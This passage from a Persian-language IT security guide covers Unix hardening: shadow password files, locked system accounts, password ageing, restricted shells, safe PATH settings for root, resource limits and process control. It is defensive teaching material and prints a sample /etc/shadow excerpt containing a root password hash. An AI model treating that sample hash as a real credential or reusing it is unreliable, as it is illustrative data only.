‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ‪ Unix‬ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺑﻬﺎ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺫﺧﻴﺮﻩ ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﻓﺎﻳﻞ‬
‫ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﻫﻤﻪ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻣﻲﺑﻮﺩ ﺗﺎ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮ ﺗﻄﺒﻴﻖ ﺩﻫﻨﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻦ ﺑﻪ ﻣﻌﻨﻲ ﺗﻮﺍﻧﺎﻳﻲ‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﻓﺎﻳﻞ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠﻲ )ﻳﺎ ﺣﺘﻲ ﺳﺎﻳﺮﻳﻦ( ﺑﻮﺩ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﺮﺩﻧﺪ ﺑﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻤـﺎﺕ ﻋـﺎﻡ ﻟﻐﺘﻨﺎﻣـﻪ‪ ،‬ﻧﺎﻣﻬـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﻭ ﻏﻴﺮﻩ‪ ،‬ﻭ ﻣﻘﺎﻳﺴﺔ ﺁﻧﻬﺎ ﺑﺎ ﻣﻘﺎﺩﻳﺮ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﻓﺎﻳﻞ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﻛﺸﻒ ﻛﻨﻨﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺟﺪﻳﺪﺗﺮ ‪ Unix‬ﻫﻢ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ‪ /etc/passwd‬ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻋﻤﻮﻣﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ‪،‬‬
‫ﻭﻟﻲ ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺩﺭ ﻓﺎﻳﻞ ‪) /etc/shadow‬ﻳﺎ ﮔﺎﻫﻲ ‪ (/etc/passwd/adjunct‬ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺗﻨﻬـﺎ ﺑـﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ‪ root‬ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺧﻮﺩ ﺩﺍﺭﺍﻱ ﺗﻌﺪﺍﺩﻱ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺮﺍﻱ ﺟﺪﺍﺳﺎﺯﻱ ﺍﻣﺘﻴﺎﺯﺍﺕ ﻣﺎﻟﻜﻴﺖ ﻓﺎﻳﻞ ﻭ ﭘـﺮﺩﺍﺯﻩ ﻣـﻲﺑﺎﺷـﻨﺪ‪ ،‬ﻣﺎﻧﻨـﺪ‬
‫‪daemon‬ﻫﺎﻱ ‪ ،uucp ،bin‬ﻭ ﻏﻴﺮﻩ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﮐﻨﻴﺪ ﻛﻪ ﻗﺴﻤﺖ ﻣﺮﺑﻮﻁ ﺑﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﺍﻳـﻦ ﺣـﺴﺎﺑﻬﺎ ﺑـﺎ‬
‫ﻼ ﻗﻄﻌﻪﺍﻱ ﺍﺯ ﻳﻚ ﻓﺎﻳـﻞ ‪ /etc/shadow‬ﺭﺍ‬ ‫ﻛﺎﺭﺍﻛﺘﺮ "*" ﺷﺮﻭﻉ ﺷﺪﻩ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺑﺎ ﻫﻴﭻ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﻣﻤﻜﻦ ﻧﻴﺴﺖ‪ .‬ﺫﻳ ﹰ‬
‫ﻣﻲﺑﻴﻨﻴﺪ‪:‬‬
‫‪root:$1$24g7KF8j$Rjky384Fd1PvtSCOJ/WW.1:12264:0:99999:7:::134551156‬‬
‫‪bin: *:10890:0:99999:7:::‬‬
‫‪daemon:*:10890:0:99999:7:::‬‬
‫‪adm:*:10890:0:99999:7:::‬‬
‫‪lp:*:10890:0:99999:7:::‬‬
‫‪sync:*:10890:0:99999:7:::‬‬
‫‪shutdown:*:10890:0:99999:7:::‬‬
‫‪halt:*:10890:0:99999:7:::‬‬

‫‪351 Cryptographic Hash‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٤٦‬‬

‫)ﻫﺮﭼﻨـﺪ ‪root‬‬ ‫ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﺗﻨﻬﺎ ﺣﺴﺎﺏ ‪ root‬ﺩﺍﺭﺍﻱ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﺘﺒﺮ ﻣﻲﺑﺎﺷﺪ ﻭ ﻫﻴﭻ ﻛﺲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺣﺴﺎﺑﻬﺎﻱ ﺩﻳﮕـﺮ ﻭﺍﺭﺩ ﺷـﻮﺩ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﺎ ﺩﺳﺘﻮﺭ ‪ su‬ﺍﻣﺘﻴﺎﺯﺍﺕ ﺁﻧﻬﺎ ﺭﺍ ﺍﺧﺘﻴﺎﺭ ﻛﻨﺪ(‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻌﺪ ﺍﺯ‬
‫ﻣﺪﺕ ﺯﻣﺎﻥ ﻣﺸﺨﺼﻲ ﻣﻨﻘﻀﻲ ﺷﻮﻧﺪ ﺗﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﺓ ﻫﻤﻴﺸﮕﻲ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺍﺯ ﻳـﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺑـﺪﻭﻥ ﺁﮔـﺎﻫﻲ ﻣﺎﻟـﻚ ﺁﻥ‬
‫ﻣﺤﺎﻓﻈﺖ ﺍﻳﺠﺎﺩ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺧﻮﺩ ﻃﻮﻝ ﻋﻤﺮﻱ ﻣﻴﺎﻥ ﻳﻚ ﺗﺎ ﺷﺶ ﻣﺎﻩ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺍﻟﺰﺍﻡ ﻛﻨﻴﺪ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺯ ﺷﺮﺍﻳﻂ ﺧﺎﺻﻲ )ﺍﺯ ﻧﻈﺮ ﻃﻮﻝ‪ ،‬ﺗﻨﻮﻉ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ‪ ،‬ﻭ ﻏﻴﺮﻩ( ﺗﺒﻌﻴﺖ ﻛﻨﻨﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴـﺖ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻻ ﺍﺯ ﻃﺮﻳﻖ ‪ PAM‬ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﻣﻲﻛﻨﻨﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﺮﺩﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﮐﺎﺭﺑﺮﻱ ﭘﻴﺶﻓﺮﺽ ﻭ ﻣﻬﻤﺎﻥ ﺍﻗﺪﺍﻡ ﻣﻨﺎﺳﺒﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﻣﺠﺒﻮﺭ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻫﺴﺘﻴﺪ‪ ،‬ﺍﺯ ﭘﻮﺳﺘﻪﻫـﺎﻱ‬
‫‪٣٥٢‬‬
‫ﻣﺤﺪﻭﺩﺷﺪﻩ ‪ rsh‬ﻳﺎ ‪ rbash‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﻣﺤﺪﻭﺩ ﺑﻪ ﺍﺟﺮﺍﻱ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﺩﺳﺘﻮﺭﺍﺕ ﺑﺎﺷﻨﺪ )ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍ ﺑﺎ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﭘﻮﺳﺘﻪ ﺭﺍﻩ ﺩﻭﺭ‬
‫ﺑﻪ ﻧﺎﻡ ‪ rsh‬ﺍﺷﺘﺒﺎﻩ ﻧﮕﻴﺮﻳﺪ(‪ .‬ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺁﻥ ﺩﺳﺘﻮﺭﺍﺕ‪ ،‬ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﭘﻮﺳﺘﻪﻫﺎﻱ ﻧﺎﻣﺤﺪﻭﺩ )ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻭﻳﺮﺍﻳـﺸﮕﺮﻫﺎ‬
‫ﺩﺍﺭﻧﺪ( ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬

‫ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺍﻱ‬


‫ﻫﺮﮔﺰ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﺗﺤﺖ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ root‬ﻏﻴﺮﻓﺸﺮﺩﻩ ﻳﺎ ﻛﺎﻣﭙﺎﻳـﻞ ﻧﻜﻨﻴـﺪ‪ .‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﺭﺍ ﻣﻌﻤـﻮ ﹰ‬
‫ﻻ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭ ﻣﺤـﻴﻂ‬
‫‪ chroot‬ﻛﺎﻣﭙﺎﻳﻞ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺑﺮﺧﻲ ﺍﻧﻮﺍﻉ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻣﺼﻮﻥ ﺑﻤﺎﻧﻴﺪ‪.‬‬
‫ﻣﺮﺍﻗﺐ ﻣﺘﻐﻴﺮ ﻣﺤﻴﻄﻲ ‪) PATH‬ﻋﻠﻲﺍﻟﺨﺼﻮﺹ ﺩﺭ ﻣﻮﺭﺩ ﻛﺎﺭﺑﺮ ‪ (root‬ﺑﺎﺷﻴﺪ‪ .‬ﻣﺘﻐﻴﺮ ‪ PATH‬ﺷـﺎﺧﻪﻫـﺎﻳﻲ ﺭﺍ ﻣـﺸﺨﺺ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﻭﻗﺘـﻲ‬
‫ﺩﺳﺘﻮﺭﻱ ﺑﺪﻭﻥ ﻣﺴﻴﺮ ﻣﻄﻠﻖ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﺑﺮﺭﺳﻲ ﻣﻲﺷﻮﻧﺪ‪ PATH .‬ﺑﺮﺍﻱ ‪ root‬ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺷﺎﺧﻪﻫﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺎﺷﺪ ﻛﻪ ﻓﻘـﻂ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺑﻨﻮﻳﺴﻨﺪ ﻭ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺮﺍﻱ ﻛﺸﻒ ﺗﻐﻴﻴﺮﺍﺕ ﻣﻤﻴﺰﻱ ﺷﻮﺩ )ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻣﺎﻧﻨـﺪ‬
‫‪ Tripwire‬ﻳـﺎ ‪ .(AIDE‬ﺷﺎﺧﻪ ﺟﺎﺭﻱ )"‪ (".‬ﺭﺍ ﺩﺭ ‪ PATH‬ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ‪ ،‬ﭼﻮﻥ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ‪ root‬ﺭﺍ ﻓﺮﻳـﺐ ﺩﺍﺩﻩ ﻭ‬
‫ﺑﻪ ﺍﺟﺮﺍﻱ ﺗﺮﺍﻭﺍﻫﺎﻱ ﺧﻮﺩ ﻭﺍﺩﺍﺭ ﻛﻨﻨﺪ‪ .‬ﻭﻗﺘﻲ ﺑﺎ ‪ root‬ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﺎﻳﭗ ﻛﺮﺩﻥ ﻣـﺴﻴﺮ ﻛﺎﻣـﻞ ﺩﺳـﺘﻮﺭﺍﺕ ﻣﻬـﻢ )ﻣﺎﻧﻨـﺪ ‪(/bin/su‬‬
‫ﻋﺎﺩﺕ ﺩﻫﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﻧﻮﺷﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻮﺳﺘﻪ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻭ ﻳﺎ "‪"cron job‬ﻫﺎ ﻧﻴﺰ ﻣﺴﻴﺮ ﻛﺎﻣﻞ ﺭﺍ ﺑﻨﻮﻳﺴﻴﺪ‪.‬‬

‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‬


‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺭﻭﺷﻬﺎﻱ ﻣﺤﺎﻓﻈﺘﻲ ﺯﻳﺎﺩﻱ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ‪ PAM‬ﻳـﺎ‬
‫ﺳﺎﻳﺮ ﻓﺎﻳﻠﻬﺎﻱ ﻭﺭﻭﺩ‪ ،‬ﺑﻪ ﺍﺯﺍﻱ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻭ ﺣﺎﻓﻈﻪ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ ‪quota‬‬
‫ﻧﻴﺰ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﺴﻚ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬

‫ﭘﺮﺩﺍﺯﻩﻫﺎ ﻭ ﺣﺎﻓﻈﻪ‬
‫‪ ps‬ﻭ ﺩﺭ ﻧـﺴﺨﻪﻫـﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬ ‫ﺩﺳﺘﻮﺭ ‪ ps‬ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‬
‫)ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ ‪ ،BSD‬ﺩﺳـﺘﻮﺭ ‪–auxw‬‬

‫‪ ،SVR5‬ﺩﺳﺘﻮﺭ ‪ .(ps –elf‬ﻫﺮ ﭘﺮﺩﺍﺯﻩ ﻳﻚ "ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﭘﺮﺩﺍﺯﻩ" ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺩﺳﺘﻮﺭﺍﺗﻲ ﻛﻪ ﺑﺎ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻣﺮﺍﻗﺐ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﺷﻴﺪ‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻣﺎﻧﻨﺪ ‪ top‬ﻭ ‪ lsof‬ﺑﻪ ﻃﻮﺭ ﻣﻨﻈﻢ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺍﺟـﺮﺍ ﺩﺭ‬
‫ﺳﻴﺴﺘﻢ ﻭ ﺍﻳﻨﻜﻪ ﭼﻪ ﻛﺴﻲ ﺁﻧﻬﺎ ﺭﺍ ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ .‬ﺣﺴﺎﺑﺪﺍﺭﻱ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ ﺗﺎ ﺳﺎﺑﻘﺔ ﭘﺮﺩﺍﺯﻩﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺩﺭ‬
‫ﺳﻴﺴﺘﻢ ﺍﺟﺮﺍ ﺷﺪﻩﺍﻧﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺯﻣﺎﻥ ﭘﺮﺩﺍﺯﺵ ﺯﻳﺎﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬

‫‪352 Remote Shell Client‬‬


‫‪٤٤٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺳﺘﻮﺭﺍﺕ ‪ nice‬ﻭ ‪ renice‬ﺑﺮﺍﻱ ﻛﻢ ﻛﺮﺩﻥ ﺍﻭﻟﻮﻳﺖ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﻧﺪ ﻭ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ ﻃﻮﻻﻧﻲ ﭘﺲﺯﻣﻴﻨﻪ‬
‫ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ‪ .‬ﻋﻼﻭ ﺑﺮ ﺁﻥ‪ root ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ‪ nice‬ﺑﺮﺍﻱ ﺯﻳﺎﺩﻛﺮﺩﻥ ﺍﻭﻟﻮﻳﺖ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ‪ .‬ﺍﻳـﻦ ﻋﻤـﻞ ﻭﻗﺘـﻲ‬
‫ﻣﻔﻴﺪ ﺍﺳﺖ ﻛﻪ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺳﺮﻋﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻛﻢ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﻭ ‪ root‬ﺑﻪ ﺯﻣﺎﻥ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺳﺘﻮﺭ ‪ kill‬ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﺳﻴﮕﻨﺎﻝ ﺑﻪ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﺑﺮﺧﻲ ﺳﻴﮕﻨﺎﻟﻬﺎ ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ ‪daemon‬ﻫﺎ ﺍﺯ ﻳﻚ ﺗﻐﻴﻴﺮ ﺩﺭ ﺳﻴـﺴﺘﻢ‬
‫ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﻳﺎ ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﮔﻮﻳﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺗﻨﻈﻴﻤﺎﺕ ﺟﺪﻳﺪ‪ ،‬ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍ ﺩﻭﺑﺎﺭﻩ ﺑﺨﻮﺍﻧﻨﺪ‪ .‬ﺍﺯ ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﺩﻳﮕـﺮ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺑﺮﺍﻱ ﻣﻌﻠﻖ ﻛﺮﺩﻥ ﻳﺎ ﺧﺎﺗﻤﻪ ﺩﺍﺩﻥ ﺑﻪ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺳﻴﮕﻨﺎﻝ ‪) TERM‬ﻛﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺑـﺎ "‪ "kill process-id‬ﻳـﺎ ﺻـﺮﻳﺤﹰﺎ ﺑـﺼﻮﺭﺕ‬
‫ﻻ ﭘﺮﺩﺍﺯﻩ ﺭﺍ ﺧﺎﺗﻤﻪ ﻣﻲﺩﻫﺪ؛ ﻭ ﺳﻴﮕﻨﺎﻝ ‪ kill‬ﺑﺪﻭﻥ ﻫﻴﭻ ﺷﺮﻃﻲ ﺑﻪ ﭘﺮﺩﺍﺯﻩ ﭘﺎﻳﺎﻥ ﻣﻲﺩﻫـﺪ‪.‬‬ ‫"‪ "kill –TERM process-id‬ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ( ﻣﻌﻤﻮ ﹰ‬
‫ﺳﻴﮕﻨﺎﻝ ‪ TSTP‬ﻳﻚ ﭘﺮﺩﺍﺯﻩ ﺭﺍ ﻣﻌﻠﻖ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﻭﻗﺘﻲ ﻣﻔﻴﺪ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﻫﺪﻑ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺣﺎﻓﻈـﻪ ﭘـﺮﺩﺍﺯﻩ ﺑـﺎ‬
‫ﺩﺳﺘﻮﺭ ‪ gcore‬ﺑﮕﻴﺮﻳﺪ‪ ،‬ﻳﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺮﺩﺍﺯﻩﻫﺎﻳﻲ ﻛﻪ ﺧﻮﺩ ﺭﺍ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ ﺗﻤﺎﻡ ﻓﻀﺎﻱ ﭘﺮﺩﺍﺯﻩﻫـﺎ ﺭﺍ ﭘـﺮ ﻛـﺮﺩﻩ ﺑﺎﺷـﻨﺪ‪ .‬ﺩﺭ ﻣـﻮﺭﺩ ﺩﻭﻡ‪،‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺑﺘﺪﺍ ﻫﺮ ﭘﺮﺩﺍﺯﻩ ﺭﺍ ﻣﻌﻠﻖ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﻫﻤﻪ ﺭﺍ ﻳﻜﺠﺎ ﺑﻜﺸﻴﺪ‪ ،‬ﻃﻮﺭﻳﻜﻪ ﺩﻳﮕﺮ ﻧﺘﻮﺍﻧﻨﺪ ﺗﺨﻢﺭﻳﺰﻱ ﻭ ﺗﻮﻟﻴﺪﻣﺜﻞ ﻛﻨﻨﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺍﺯ ﺣﺎﻓﻈﻪ ﻣﺠﺎﺯﻱ )ﻛﻪ ﺍﺯ ﻗﺪﻳﻢ ﺑﻪ ﻓﻀﺎﻱ ‪ swap‬ﻣﻌﺮﻭﻑ ﺍﺳﺖ( ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﻭﻗﺘـﻲ ﭘـﺮﺩﺍﺯﻩﻫـﺎﻱ ﺩﺭﻭﻥ ﺳﻴـﺴﺘﻢ‬
